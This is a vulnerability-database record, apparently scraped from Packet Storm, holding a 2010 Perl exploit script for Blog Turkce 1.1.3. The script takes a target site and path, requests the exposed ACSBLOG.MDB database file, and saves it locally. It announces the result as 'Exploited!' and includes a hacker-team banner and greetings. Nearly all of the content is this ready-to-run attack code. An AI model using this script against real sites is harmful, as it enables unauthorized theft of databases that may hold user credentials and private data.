{"id": "PACKETSTORM:94841", "vendorId": null, "type": "packetstorm", "bulletinFamily": "exploit", "title": "Blog Turkce 1.1.3 Database Disclosure", "description": "", "published": "2010-10-16T00:00:00", "modified": "2010-10-16T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "cvss2": {}, "cvss3": {}, "href": "https://packetstormsecurity.com/files/94841/Blog-Turkce-1.1.3-Database-Disclosure.html", "reporter": "indoushka", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2016-11-03T10:29:41", "viewCount": 9, "enchantments": {"score": {"value": -0.9, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.9}, "_state": {"dependencies": 1678912101, "score": 1678911848, "epss": 1678924918}, "_internal": {"score_hash": "e60208790d5221a1e0079f46fdb4bd5c"}, "sourceHref": "https://packetstormsecurity.com/files/download/94841/blogturkce-disclose.txt", "sourceData": "`#!/usr/bin/perl -w \n# \n# blog turkce v1.1.3-(tr) Database Disclosure Exploit \n# \n# Found & Coded: indoushka \n# \n# Date: 25/07/2010 \n# \n# Home: http://www.hack-r1z.com/cc/ \n# \n#Dz-Ghost Team ===== Saoucha * Star08 * Cyber Sec * theblind74 * XproratiX * onurozkan * n2n * Meher Assel =========================== \n#special thanks to : r0073r (inj3ct0r.com) * L0rd CruSad3r * MaYur * MA1201 * KeDar * Sonic * gunslinger_ * SeeMe * RoadKiller \n#Sid3^effects * aKa HaRi * His0k4 * Hussin-X * Rafik * Yashar * SoldierOfAllah * RiskY.HaCK * Stake * r1z * D4NB4R * www.alkrsan.net \n#MR.SoOoFe * ThE g0bL!N * AnGeL25dZ * ViRuS_Ra3cH * Sn!pEr.S!Te \n#--------------------------------------------------------------------------------------------------------------------------------- \n# \n# Download : http://www.aspdunyasi.com \n \n \n \nuse LWP::Simple; \nuse LWP::UserAgent; \n \nsystem('cls'); \nsystem('title acs-blog turkce v1.1.3-(tr) Database Disclosure Exploit'); \nsystem('color a'); \n \n \nif(@ARGV < 2) \n{ \nprint \"[-]How To Use\\n\\n\"; \n&help; exit(); \n} \nsub help() \n{ \nprint \"[+] usage1 : perl $0 site.com /path/ \\n\"; \nprint \"[+] usage2 : perl $0 localhost / \\n\"; \n} \n \nprint \"\\n************************************************************************\\n\"; \nprint \"\\n1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0\\n\"; \nprint \"\\0 _ __ __ __ 1\\n\"; \nprint \"\\1 /' \\ __ /'__`\\ /\\ \\__ /'__`\\ 0\\n\"; \nprint \"\\0 /\\_, \\ ___ /\\_\\/\\_\\ \\ \\ ___\\ \\ ,_\\/\\ \\/\\ \\ _ ___ 1\\n\"; \nprint \"\\1 \\/_/\\ \\ /' _ `\\ \\/\\ \\/_/_\\_<_ /'___\\ \\ \\/\\ \\ \\ \\ \\/\\`'__\\ 0\\n\"; \nprint \"\\0 \\ \\ \\/\\ \\/\\ \\ \\ \\ \\/\\ \\ \\ \\/\\ \\__/\\ \\ \\_\\ \\ \\_\\ \\ \\ \\/ 1\\n\"; \nprint \"\\1 \\ \\_\\ \\_\\ \\_\\_\\ \\ \\ \\____/\\ \\____\\\\ \\__\\\\ \\____/\\ \\_\\ 0\\n\"; \nprint \"\\0 \\/_/\\/_/\\/_/\\ \\_\\ \\/___/ \\/____/ \\/__/ \\/___/ \\/_/ 1\\n\"; \nprint \"\\1 \\ \\____/ >> Exploit database separated by exploit 0\\n\"; \nprint \"\\0 \\/___/ type (local, remote, DoS, etc.) 1\\n\"; \nprint \"\\1 1\\n\"; \nprint \"\\0 [+] Site : Inj3ct0r.com 0\\n\"; \nprint \"\\1 [+] Support e-mail : submit[at]inj3ct0r.com 1\\n\"; \nprint \"\\0 0\\n\"; \nprint \"\\1 ####################################### 1\\n\"; \nprint \"\\0 I'm indoushka member from Inj3ct0r Team 1\\n\"; \nprint \"\\1 ####################################### 0\\n\"; \nprint \"\\0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1\\n\"; \n($TargetIP, $path, $File,) = @ARGV; \n \n$File=\"ACSBLOG.MDB\"; \nmy $url = \"http://\" . $TargetIP . $path . $File; \nprint \"\\n wait!!! \\n\\n\"; \n \nmy $useragent = LWP::UserAgent->new(); \nmy $request = $useragent->get($url,\":content_file\" => \"D:/ACSBLOG.MDB\"); \n \nif ($request->is_success) \n{ \nprint \"[+] $url Exploited!\\n\\n\"; \nprint \"[+] Database saved to D:/ACSBLOG.MDB\\n\"; \nexit(); \n} \nelse \n{ \nprint \"[!] Exploiting $url Failed !\\n[!] \".$request->status_line.\"\\n\"; \nexit(); \n} \n \n`\n"}
{}